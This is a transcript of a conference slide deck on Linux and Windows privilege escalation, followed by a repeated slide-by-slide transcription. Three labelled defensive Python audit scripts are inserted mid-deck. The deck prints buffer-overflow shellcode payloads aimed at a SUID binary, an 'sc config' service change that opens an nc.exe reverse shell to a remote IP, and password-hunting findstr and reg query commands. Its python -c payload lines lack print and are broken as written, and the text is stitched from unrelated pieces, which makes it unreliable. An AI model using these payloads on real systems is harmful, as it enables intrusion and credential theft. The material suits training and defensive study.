How Fun of Privilege Escalation
Ammarit Thongthua, CISSP CISM GXPN
Risk Advisory Manager, Deloitte Thailand
# whoami
<Name>
Ammarit Thongthua
Khay
Shellcodenoobx
</Name>
<Job>
Risk Advisory Manager, Deloitte Thailand
Penetration Tester
Security Consultant
</Job>
<Education>
B.Eng Com, ABAC
M.Sci Cyber Security and Info Assurance, Mahidol Unv.
CISSP, CISM, CSSLP, GXPN, CCNP, CEH, Security+
</Education>
# “Privilege Escalation”
Where privilege escalation sits in the attack lifecycle:
Pre Exploitation
- Information gathering
- Scanning
- Enumeration
Exploitation
- Remote Exploitation: gain system access, gain information, denial of service, privilege escalation
- Local Exploitation: bypass restriction, privilege escalation
Post Exploitation
- Gathering sensitive info
- Manage system/service
- Pivoting
# “Privilege Escalation”
Privilege levels, highest first:
Windows: NT AUTHORITY\System > Administrators > Power Users > Users / Service Users
Unix: Root > Sudoer > Users / Service Users
# “Privilege Escalation”
• Vertical privilege escalation -> Gain higher privilege (e.g. user john -> Root)
• Horizontal privilege escalation -> Gain access with other accounts (e.g. user john -> service users such as Apache, mysql)
# “Privilege Escalation”
Windows: NT AUTHORITY\System > Administrators > Power Users > Users / Service Users
Entry points shown on the slide: Anonymous FTP, Webshell, Local Exploit, Vulnerable Service Exploit
# “Privilege Escalation”
Windows: NT AUTHORITY\System > Administrators > Power Users > Users / Service Users
Labels on the slide: Unauthorized Access, Users, Local Exploit
# Remote and Local Exploitation
• Remote Exploitation: over the network (TCP/UDP) against listening services, e.g.
TCP 20/21, TCP 22, TCP 23, TCP 25, UDP 53, TCP 80, UDP 161, TCP 443, TCP 445, TCP/UDP 514, TCP 1433, TCP 1521, TCP 3306, TCP 3389, TCP XXXX (any other service port)
# Remote and Local Exploitation
• Local Exploitation techniques: Race Condition, Buffer Overflow, Heap Overflow, Kernel Exploit, Evasion, DLL Injection, DLL Hijacking, Hot Potato, Mis-configured Service / file permission
# “Privilege Escalation”
What it gives the attacker:
• Access to restricted resources/files
• System credentials: /etc/shadow, SAM file, Registry, configuration files, encryption keys, system memory
• Run privileged commands, change system configuration, install software
• Pivoting
• Maintain access, backdoor
• Key logger, rootkit, dump traffic
• Many more..
# “Privilege Escalation” Ways for Linux
• Remote exploit of a vulnerable service running as a high-privilege user
• Weak password of a high-privilege user
• Credentials stored in files with weak permissions
  • Configuration and log files
  • History
  • Env, $PATH
• Shell escape (restricted shell, chroot)
• Vulnerable applications / programs / services running as high-privilege users
• Weak permissions on job/task files run by high-privilege users
• Sudoer
• System misconfiguration
• Kernel exploitation
• Remote exploitation via localhost
# “Privilege Escalation” Ways for Linux
• Remote exploit of a vulnerable service running as a high-privilege user
Example (FILE_SERVER): smbd runs as root, so a remote exploit against it lands as root directly
#ps -ef | grep root
root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D
# “Privilege Escalation” Ways for Linux
• Weak password of a high-privilege user
The password may be similar to the username, or a weak one such as: root, Password, P@ssw0rd, ...
# “Privilege Escalation” Ways for Linux
• Credentials stored in files with weak permissions
  • Configuration and log files
  • History
  • Env, $PATH
# “Privilege Escalation” Ways for Linux
• Restricted Shell Escape
https://netsec.ws/?p=337
https://0feci.wordpress.com/tag/escaping-restricted-shell-bypass/
# “Privilege Escalation” Ways for Linux
• Vulnerable applications / programs / services running as high-privilege users
• Characteristics of a vulnerable program
  • Owned by "root" as user or group
  • Has SUID / SGID set
  • Can be overflowed
  • Uses static libc (nice to have)
Finding SUID/SGID files:
list="$(find / -perm -4000 -o -perm -2000 2>/dev/null)"; for i in $list; do ls -al "$i"; done
ls -lR / 2>/dev/null | grep "wsr" | grep "root"
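As an added example (not the deck's own code), the same SUID/SGID sweep in Python from the defender's side: it classifies every set-id file as expected or needing review against a constructed baseline (`BASELINE`); the `classify_setid` and `scan_setid` names are this example's assumptions.

```python
"""Classify the setuid/setgid files on a Linux host.

Added example, not the deck's code: does what the `find / -perm -4000 -o
-perm -2000` sweep above does, but separates the set-id binaries a host is
expected to have from the ones a defender should review.
"""
import os
import stat
from dataclasses import dataclass, field
from typing import List, Optional, Set

# Constructed baseline of set-id binaries a stock host normally carries; a
# real audit would take it from a golden image or the package manifests.
BASELINE: Set[str] = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/newgrp", "/usr/bin/mount", "/usr/bin/umount",
}
SKIP_PREFIXES = ("/proc", "/sys", "/dev", "/run")  # pseudo filesystems

@dataclass
class SetIdFinding:
    path: str
    flags: List[str] = field(default_factory=list)     # which set-id bits, whose
    problems: List[str] = field(default_factory=list)  # why it needs review

    @property
    def needs_review(self) -> bool:
        return bool(self.problems)

def classify_setid(path: str, mode: int, uid: int, gid: int,
                   baseline: Set[str] = BASELINE) -> Optional[SetIdFinding]:
    """Classify one stat() result; None unless it is a regular set-id file.

    `problems` is empty only for a baseline binary that nobody but its owner
    can modify, so the caller can diff the rest against a known-good list.
    """
    if not stat.S_ISREG(mode):
        return None
    is_suid, is_sgid = bool(mode & stat.S_ISUID), bool(mode & stat.S_ISGID)
    if not (is_suid or is_sgid):
        return None
    f = SetIdFinding(path)
    if is_suid:
        f.flags.append("suid-root" if uid == 0 else f"suid-uid{uid}")
    if is_sgid:
        f.flags.append("sgid-root" if gid == 0 else f"sgid-gid{gid}")
    # A writable set-id file is the worst case: whoever can write it runs
    # code as the owner (root in the suid-root case) the next time it is run.
    if mode & stat.S_IWOTH:
        f.problems.append("world-writable")
    elif mode & stat.S_IWGRP:
        f.problems.append("group-writable")
    if path not in baseline:
        f.problems.append("not-in-baseline")
    return f

def scan_setid(root: str = "/", baseline: Set[str] = BASELINE) -> List[SetIdFinding]:
    """Walk `root` and classify every regular file with SUID or SGID set.

    Symlinks are not followed and unreadable directories are skipped, so this
    runs as an unprivileged user too (it just sees less). Review items first.
    """
    findings: List[SetIdFinding] = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        if dirpath.startswith(SKIP_PREFIXES):
            dirnames[:] = []                 # do not descend into pseudo fs
            continue
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)          # lstat: never follow symlinks
            except OSError:
                continue
            found = classify_setid(full, st.st_mode, st.st_uid, st.st_gid, baseline)
            if found is not None:
                findings.append(found)
    return sorted(findings, key=lambda x: (not x.needs_review, x.path))

if __name__ == "__main__":
    for item in scan_setid("/"):
        tag = "REVIEW  " if item.needs_review else "expected"
        print(tag, item.path, ",".join(item.flags), ",".join(item.problems))
```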
# “Privilege Escalation” Ways for Linux
• Vulnerable applications / programs / services running as high-privilege users
• Characteristic of a vulnerable program: can be overflowed
Check the buffer overflow position (the offset at which the saved return address is overwritten), then find a jmp esp gadget in the binary:
#objdump -d vul_app | grep "jmp" | grep "esp"
# ROPgadget --binary vul_app --only "jmp" | grep esp
0x08049f0f : jmp %esp
# “Privilege Escalation” Ways for Linux
• Vulnerable applications / programs / services running as high-privilege users
Shellcode: system("/bin//sh")
Shellcode =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80"
Payload layout: "A"*612 (padding up to the saved return address) + "\x0f\x49\x04\x08" (0x08049f0f, the jmp %esp gadget, little-endian) + NOP sled + shellcode, so the return jumps to esp, which points at the sled
#python -c '"A"*612 + "\x0f\x49\x04\x08" +
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80"' | ./vul_app
# “Privilege Escalation” Ways for Linux
• Vulnerable applications / programs / services running as high-privilege users
Privilege is dropped: the spawned shell gives up the effective root UID when it differs from the real UID, so the attacker lands in an unprivileged shell.
Workaround on the slides: write a small program in /tmp/sh.c (#nano /tmp/sh.c) and point the shellcode at it instead of /bin//sh, by changing the pushed "/bin" bytes (\x2F\x62\x69\x6E) to "/tmp" (\x2F\x74\x6d\x70):
#python -c '"A"*612 + "\x0f\x49\x04\x08" +
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x74\x6d\x70\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80"' | ./vul_app
# “Privilege Escalation” Ways for Linux
The real life is not easy !!!!
• Canary (buffer overflow detection)
• Executable stack prevention (NX, DEP)
• Address Space Layout Randomization (ASLR)
But it’s possible to bypass !!!
• Canary (buffer overflow detection) -> Canary repair
• Executable stack prevention (NX, DEP) -> Ret-2-Libc, ROP
• Address Space Layout Randomization (ASLR) -> Static lib, App wrap-up
https://www.slideshare.net/ammarit/unix-executable-buffer-overflow?qid=3ae3efd0-d1b4-4f3c-b85c-82b1d063aa6b&v=&b=&from_search=1
# “Privilege Escalation” Ways for Linux
• Weak permissions on job/task files run by high-privilege users
Cron locations to check:
/etc/cron.d
/etc/crontab
/etc/cron.hourly
/etc/cron.daily
/etc/cron.weekly
/etc/cron.monthly
# ls -Ral /etc/cron*
Demo on the slides: reverse shell from a writable cron job
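Added example, not from the deck: a Python audit of the cron locations listed above that parses the /etc/crontab and /etc/cron.d job format and reports any job target, or parent directory of one, that a non-root user can write to. The crontab text, the fake filesystem (`FAKE_FS`) and the function names are constructed for this example.

```python
"""Audit system cron jobs for targets a non-root user could modify.

Added example, not the deck's code: parses the /etc/crontab and /etc/cron.d
format (m h dom mon dow user command) and checks every absolute path in each
command, plus its parent directories, for weak permissions.
"""
import os
import posixpath
import re
import stat
from typing import Callable, List, Optional, Tuple

StatTuple = Tuple[int, int, int]               # (st_mode, st_uid, st_gid)
StatFn = Callable[[str], Optional[StatTuple]]  # injectable; None if path is absent

# "m h dom mon dow user command" or "@reboot user command"
_CRON_LINE = re.compile(
    r"^(?P<sched>@\w+|(?:\S+\s+){4}\S+)\s+(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")

def parse_system_crontab_line(line: str) -> Optional[Tuple[str, str]]:
    """(user, command) for a job line; None for blanks, comments, env lines."""
    s = line.strip()
    if not s or s.startswith("#") or re.match(r"^[A-Za-z_]\w*=", s):
        return None                     # PATH=..., SHELL=..., MAILTO=...
    m = _CRON_LINE.match(s)
    return (m.group("user"), m.group("cmd")) if m else None

def command_targets(cmd: str) -> List[str]:
    """Every absolute path in the command (script, interpreter, run-parts dir)."""
    seen: List[str] = []
    for tok in cmd.split():
        tok = tok.strip("\"'")
        if tok.startswith("/") and tok not in seen:
            seen.append(tok)
    return seen

def ancestors(path: str) -> List[str]:
    """Parent directories of `path`, nearest first, ending with '/'."""
    path = posixpath.normpath("/" + path.lstrip("/"))
    out: List[str] = []
    while path != "/":
        path = posixpath.dirname(path)
        out.append(path)
    return out

def permission_issues(path: str, st: StatTuple, job_user: str) -> List[str]:
    """Why `path` is a problem for a job running as `job_user`, if it is."""
    mode, uid, gid = st
    issues: List[str] = []
    sticky_dir = stat.S_ISDIR(mode) and bool(mode & stat.S_ISVTX)  # /tmp style
    if mode & stat.S_IWOTH and not sticky_dir:
        issues.append(f"{path} is world-writable")
    elif mode & stat.S_IWGRP and gid != 0:
        issues.append(f"{path} is writable by group {gid}")
    if job_user == "root" and uid != 0:
        issues.append(f"{path} is owned by uid {uid} but the job runs as root")
    return issues

def audit_crontab_text(text: str, stat_fn: StatFn) -> List[str]:
    """One finding string per weak path in a crontab-format file."""
    findings: List[str] = []
    for line in text.splitlines():
        parsed = parse_system_crontab_line(line)
        if parsed is None:
            continue
        user, cmd = parsed
        for target in command_targets(cmd):
            for path in [target] + ancestors(target):
                st = stat_fn(path)
                for issue in (permission_issues(path, st, user) if st else []):
                    findings.append(f"[{user}] {cmd!r}: {issue}")
    return findings

def real_stat(path: str) -> Optional[StatTuple]:
    """StatFn for the live host."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return (st.st_mode, st.st_uid, st.st_gid)

# Constructed sample: a crontab and a fake filesystem with two weak spots.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin
17 *\t* * *\troot    cd / && run-parts --report /etc/cron.hourly
@reboot root /opt/scripts/start.sh
*/5 * * * * root /usr/local/bin/backup.sh --full
"""
FAKE_FS = {p: (0o040755, 0, 0) for p in  # sane root-owned 0755 directories
           ["/", "/etc", "/etc/cron.hourly", "/opt", "/usr", "/usr/local", "/usr/local/bin"]}
FAKE_FS["/opt/scripts"] = (0o040777, 0, 0)                 # world-writable directory
FAKE_FS["/opt/scripts/start.sh"] = (0o100755, 0, 0)
FAKE_FS["/usr/local/bin/backup.sh"] = (0o100775, 0, 1001)  # group-writable, gid 1001

def fake_stat(path: str) -> Optional[StatTuple]:
    return FAKE_FS.get(path)
```

On a live host the same function runs over the real files, e.g. `audit_crontab_text(open("/etc/crontab").read(), real_stat)` for /etc/crontab and again for each file in /etc/cron.d.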
• Sudoer (the compromised user may already be in the sudoers list)
# “Privilege Escalation” Ways for Linux
• System Misconfiguration
# “Privilege Escalation” Ways for Linux
• Kernel Exploitation
Ex: DirtyCOW
# “Privilege Escalation” Ways for Linux
• Kernel Exploitation (trick)
Ex: Linux version 2.6.9-89.EL
• Compile the exploit on the target system, or in a target-like environment
• Metasploitable is a good environment for compiling exploits
# “Privilege Escalation” Ways for Linux
• Remote exploitation via localhost (127.0.0.1): a service bound only to the loopback interface can still be exploited from a local shell
#ps -ef | grep root
root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D
# “Privilege Escalation” Ways for Linux
• Linux Privilege Escalation Scripts and Commands
Ref: https://netsec.ws/?p=309
LinEnum: http://www.rebootuser.com/?p=1758
LinuxPrivChecker: http://www.securitysift.com/download/linuxprivchecker.py
Basic-linux-privilege-escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation
• LinuxPrivChecker (sample output on the slides)
# “Privilege Escalation” Ways for Linux
• Case Study:
But no exploit detail in exploit-db !!!
Steps shown in the case-study diagram: Low Priv, Dirty Cow, root, Default password, Crack root pass, Bypass Restrict Shell, Other Unix Servers, CMC
# “Privilege Escalation” Ways for Windows
• Remote exploit of a vulnerable service running as a high-privilege user
• Weak password of a high-privilege user
• Credentials stored in files and the Registry
• Vulnerable applications / programs / services running as high-privilege users
• Weak permissions on job/task files run by high-privilege users
• System misconfiguration
• Kernel exploitation
• Pass-the-hash
• DLL Injection
• DLL Hijacking
• Remote exploitation via localhost
• Hot Potato
• Many more…
# Remote Exploit to escalate privilege
• Exploit a vulnerable service running as a high-privilege user
Credit: Worawit Wangwarunyoo (sleepya)
• Exploit a misconfigured service running as a high-privilege user (e.g. via a WebShell)
# “Privilege Escalation” Ways for Windows
• Reverse Meterpreter “getsystem” command
“It’s not always easy in the real life”
• PS Migration (process migration)
# Remote Exploit to escalate privilege
• Credentials stored in files
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
(also search for: Pass, PASS, PWD)
c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
# Remote Exploit to escalate privilege
• Credentials stored in DC policy script files (\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies)
https://adsecurity.org/?p=2288
# Remote Exploit to escalate privilege
• Credentials stored in the registry
# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
# SNMP parameters
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
# PuTTY
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
# Remote Exploit to escalate privilege
• Dumping passwords in plain text on Windows 8.1 / Windows Server 2012
http://www.labofapenetrationtester.com/2015/05/dumping-passwords-in-plain-on-windows-8-1.html
# Remote Exploit to escalate privilege
• Token Impersonation
https://www.offensive-security.com/metasploit-unleashed/fun-incognito/
# “Privilege Escalation” Ways for Windows
• Insecure service permissions -> modify binpath
https://technet.microsoft.com/en-us/sysinternals/accesschk.aspx
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
• Insecure service permissions -> modify binpath (example)
sc config upnphost binpath= "C:\Inetpub\nc.exe -nv 10.11.0.110 5555 -e C:\WINDOWS\System32\cmd.exe"
• Insecure service permissions by msf
# “Privilege Escalation” Ways for Windows
Ref: https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
• Unquoted Service Paths
When Windows attempts to run a service whose binary path contains spaces and is not quoted, it tries the candidate paths in order and runs the first EXE it finds: for example, for C:\Program Files\Some Folder\Service.exe it tries C:\Program.exe, then C:\Program Files\Some.exe, then the real binary.
• Unquoted path + MS15-067
GGEZ
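Added example, not from the deck or the referenced blog: Python that reproduces the lookup order for an unquoted service path and cross-checks the intermediate candidates against directories already known to be writable by non-admins, so a finding can be fixed by quoting the path or tightening the directory ACL. The `sc qc` sample text, the `SAMPLE_WRITABLE_DIRS` set and the function names are constructed for this example.

```python
"""Find Windows services whose unquoted binary path can be hijacked.

Added example, not the deck's or the referenced blog's code: reproduces the
lookup order Windows uses for an unquoted path containing spaces and reports
which intermediate candidate would be loaded from a directory that non-admin
users can write to. Input is `sc qc` output; the sample below is constructed.
"""
import ntpath
import re
from typing import Dict, List, Set, Tuple

_SERVICE = re.compile(r"^SERVICE_NAME:\s*(\S+)", re.M)
_BINPATH = re.compile(r"^\s*BINARY_PATH_NAME\s*:\s*(.*?)\s*$", re.M)

def service_path_candidates(binpath: str) -> List[str]:
    """Executables CreateProcess tries, in order, for a service binPath.

    A quoted path is unambiguous. In an unquoted one every space may end the
    program name, so C:\\A B\\c.exe is tried as C:\\A.exe, then C:\\A B\\c.exe.
    """
    binpath = binpath.strip()
    if binpath.startswith('"'):
        return [binpath[1:binpath.index('"', 1)]]
    tokens = binpath.split(" ")
    cands: List[str] = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            cands.append(prefix)        # the real binary: search stops here
            break
        cands.append(prefix + ".exe")   # what Windows would try before it
    return cands

def is_unquoted_with_spaces(binpath: str) -> bool:
    """True when more than one candidate exists, i.e. hijackable in principle;
    whether it is in practice depends on the directory ACLs."""
    return len(service_path_candidates(binpath)) > 1

def _norm(d: str) -> str:
    return ntpath.normcase(d).rstrip("\\")

def hijack_points(binpath: str, writable_dirs: Set[str]) -> List[Tuple[str, str]]:
    """(candidate, directory) pairs for intermediate candidates whose directory
    is in `writable_dirs` (collected separately, e.g. with icacls or accesschk)."""
    norm = {_norm(d) for d in writable_dirs}
    cands = service_path_candidates(binpath)
    return [(c, ntpath.dirname(c)) for c in cands[:-1]
            if _norm(ntpath.dirname(c)) in norm]

def parse_sc_qc(text: str) -> Dict[str, str]:
    """SERVICE_NAME -> BINARY_PATH_NAME from one or more `sc qc` outputs."""
    return dict(zip(_SERVICE.findall(text), _BINPATH.findall(text)))

def audit_services(sc_output: str, writable_dirs: Set[str]) -> Dict[str, List[Tuple[str, str]]]:
    """Services with an unquoted path and at least one writable hijack point.
    Fix: quote the path in the service configuration or tighten the ACL."""
    result: Dict[str, List[Tuple[str, str]]] = {}
    for name, binpath in parse_sc_qc(sc_output).items():
        if is_unquoted_with_spaces(binpath):
            points = hijack_points(binpath, writable_dirs)
            if points:
                result[name] = points
    return result

# Constructed `sc qc` output: one safe service, one with an unquoted path.
SAMPLE_SC_QC = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: upnphost
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 3   DEMAND_START
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
        SERVICE_START_NAME : NT AUTHORITY\LocalService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: VendorUpdater
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Vendor Tools\Update Agent\agent.exe -service
        SERVICE_START_NAME : LocalSystem
"""
# Constructed: directories an ACL check reported as writable by non-admins.
SAMPLE_WRITABLE_DIRS = {r"C:\Vendor Tools", r"C:\Users\Public"}

if __name__ == "__main__":
    for svc, points in audit_services(SAMPLE_SC_QC, SAMPLE_WRITABLE_DIRS).items():
        for cand, d in points:
            print(f"{svc}: {cand} would be loaded from writable dir {d}")
```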
# “Privilege Escalation” Ways for Windows
• DLL Hijacking
https://msitpros.com/?p=2012
The way that Windows loads DLLs is to search the following directories in this order:
– The directory from which the application loaded
– C:\Windows\System32
– C:\Windows\System
– C:\Windows
– The current working directory
– Directories in the system PATH environment variable
– Directories in the user PATH environment variable
https://www.gracefulsecurity.com/privesc-dll-hijacking/
https://pentestlab.blog/2017/03/27/dll-hijacking/
# “Privilege Escalation” Ways for Windows
• Driver Exploitation
Example: Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation
https://www.exploit-db.com/exploits/42665/
# “Privilege Escalation” Ways for Windows
• Hot Potato
Demo on the slides: add a user manually, then use the Hot Potato technique
# “Privilege Escalation” Ways for Windows
• Pass-the-Hash
• Remote exploit on the localhost
# “Privilege Escalation” Ways for Windows
• Local exploit with Metasploit
• Local exploit to escalate privilege
Setting up wine and pyinstaller on the attacking Linux box (to build Windows executables from Python exploits):
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
pip install pyinstaller
DEMO Noobx_shell
# “Privilege Escalation” Ways for Windows
• Case Study 2 # MS17-010
Diagram: DC1, Servers, Client PC (unpatched)
# “Privilege Escalation” on other devices
• Mobile Phone
  • Root or Jailbreak
  • DirtyCow
• Network Device
  • Remote Exploit
    • EXTRABACON exploit
  • Backdooring
  • ROM0
  • Password crack of a high-privilege account
# Prevention
• Secure by design
• System hardening
  • Disable unused services
  • Disable/remove unused programs, users and backup files
  • Install endpoint security
• Strong access control and authentication
• Least privilege
• Patch management
• Security assessment
  • Vulnerability assessment
  • Penetration testing
Q & A
Thank You
Ammarit Thongthua, CISSP CISM GXPN
Risk Advisory Manager, Deloitte Thailand
# References
• http://www.fuzzysecurity.com/tutorials/16.html
• https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
• https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Privilege%20Escalation%20%26%20Post-Exploitation.md
• http://www.hackingarticles.in/7-ways-get-admin-access-remote-windows-pc-bypass-privilege-escalation/
• https://pentestlab.blog/2017/04/04/dll-injection

How fun of privilege escalation Red Pill2017

  • 1. How Fun of Privilege Escalation Ammarit Thongthua, CISSP CISM GXPN Risk Advisory Manager, Deloitte Thailand
  • 2. # whoami <Name> Ammarit Thongthua Khay Shellcodenoobx </Name> <Job> Risk Advisory Manager, Deloitte Thailand Penetration Tester Security Consultant </Job> <Education> B.Eng Com, ABAC M.Sci Cyber Security and Info Assurance, Mahidol Unv. CISSP, CISM, CSSLP, GXPN, CCNP, CEH, Security+ </Education>
  • 3. Pre Exploitation Exploitation Post Exploitation # “Privilege Escalation” Information gathering Scanning Enumeration Remote Exploitation - Gain system access - Gain information - Denial of services - Privilege Escalation Local Exploitation - Bypass Restriction - Privilege Escalation Gathering Sensitive Info Manage System/Service Pivoting Windows
  • 4. # “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users Users Root Sudoer UsersService Users Service Users Windows Unix
  • 5. # “Privilege Escalation” • Vertical privilege escalation -> Gain higher privilege • Horizontal privilege escalation -> Gain access with other accounts Users Service Users john Apache, mysql Users john Root
  • 6. # “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users Users UsersService Users Windows Anonymous FTP Webshell LocalExploit Vul. Service Exp
  • 7. # “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users UsersService Users Windows Unauthorized Access LocalExploit Users
  • 8. # “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users UsersService Users Windows Unauthorized Access LocalExploit Users
  • 9. # Remote and Local Exploitation Network TCP/UDP TCP: 20/21 TCP: 22 TCP: 23 TCP: 25 UDP: 53 TCP: 80 UDP: 161 TCP: 443 TCP: 445 TCP/UDP : 514 TCP: 1433 TCP: 1521 TCP: 3306 TCP: 3389 TCP: XXXX • Remote Exploitation
  • 10. # Remote and Local Exploitation Race Condition Buffer Overflow Heap Overflow Kernel Exploit Evasion DLL Injection DLL Hijacking Hot Potato Mis-config Service, file permission
  • 11. # Remote and Local Exploitation Root
  • 12. # “Privilege Escalation” • Access to restricted resources/file • System Credential • /etc/shadow • SAM file • Registry • Configuration files • Encryption Key • System memory • Run privilege commands , set system configuration and Installations • Pivoting • Maintain access , Backdoor • Key logger, Rootkit, Dump traffic • Many more..
  • 16. # “Privilege Escalation” Ways for Linux • Remote exploit of a vulnerable service running as a high-privilege user • Weak password of high-privilege users • Credentials stored in files with weak permissions: configuration files, log files, shell history, environment / $PATH • Shell escape (restricted shell, chroot) • Vulnerable applications / programs / services running as high-privilege users • Weak permissions on job/task files run by high-privilege users • Sudoers • System misconfiguration • Kernel exploitation • Remote exploitation via localhost
  • 17. # “Privilege Escalation” Ways for Linux • Remote Exploit to vulnerable service running by high privilege users
  • 18. # “Privilege Escalation” Ways for Linux • Remote Exploit to vulnerable service running by high privilege users FILE_SERVER # ps -ef | grep root root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D
  • 19. # “Privilege Escalation” Ways for Linux • Weak password of high privilege users: the password may be similar to the username, or simply weak (root, Password, P@ssw0rd, ....)
  • 20. # “Privilege Escalation” Ways for Linux • Credential store in file with weak permission • Configurations, Logs files • History • Env, $PATH
  • 21. # “Privilege Escalation” Ways for Linux • Restricted Shell Escape https://netsec.ws/?p=337
  • 22. # “Privilege Escalation” Ways for Linux • Restricted Shell Escape https://netsec.ws/?p=337 https://0feci.wordpress.com/tag/escaping-restricted-shell-bypass/
  • 23. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users • Characteristics of a vulnerable program • Owned by “root” (user or group) • Has SUID / SGID set • Can be overflowed • Uses static libc (nice to have)
  • 24. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users • Characteristics of a vulnerable program • Owned by “root” (user or group) • Has SUID / SGID set list="$(find / -perm -4000 -o -perm -2000)"; for i in $list; do ls -al $i; done ls -lR / | grep "wsr" | grep "root"
  • 25. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users
  • 26. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users • Characteristic of vulnerable program • Can perform Overflow
  • 27. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users Check buffer overflow position
  • 28. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users Check buffer overflow position
  • 29. # objdump -d vul_app | grep "jmp" | grep "esp" # ROPgadget --binary vul_app --only "jmp" | grep esp 0x08049f0f : jmp %esp # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users
  • 30. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users Shellcode: system("/bin//sh") Shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80" jmp %esp 0x08049f0f esp
  • 31. # python -c '"A"*612 + "\x0f\x49\x04\x08" + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80"' | ./vul_app # “Privilege Escalation” Ways for Linux Privilege is dropped
  • 32. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users #nano /tmp/sh.c
  • 33. # “Privilege Escalation” Ways for Linux # python -c '"A"*612 + "\x0f\x49\x04\x08" + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x74\x6d\x70\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80"' | ./vul_app • Vulnerable Applications / Programs / Services use high privilege users
  • 35. # “Privilege Escalation” Ways for Linux The real life is not easy !!!! • Canary (Buffer overflow detection) • Executable Stack Prevention (NX , DEP) • Address Space Layout Randomization (ASLR)
  • 36. # “Privilege Escalation” Ways for Linux But it’s possible to bypass !!! • Canary (Buffer overflow detection) -> Canary Repair • Executable Stack Prevention (NX, DEP) -> Ret-2-Libc, ROP • Address Space Layout Randomization (ASLR) -> Static Lib, App Wrap-up https://www.slideshare.net/ammarit/unix-executable-buffer-overflow?qid=3ae3efd0-d1b4-4f3c-b85c-82b1d063aa6b&v=&b=&from_search=1
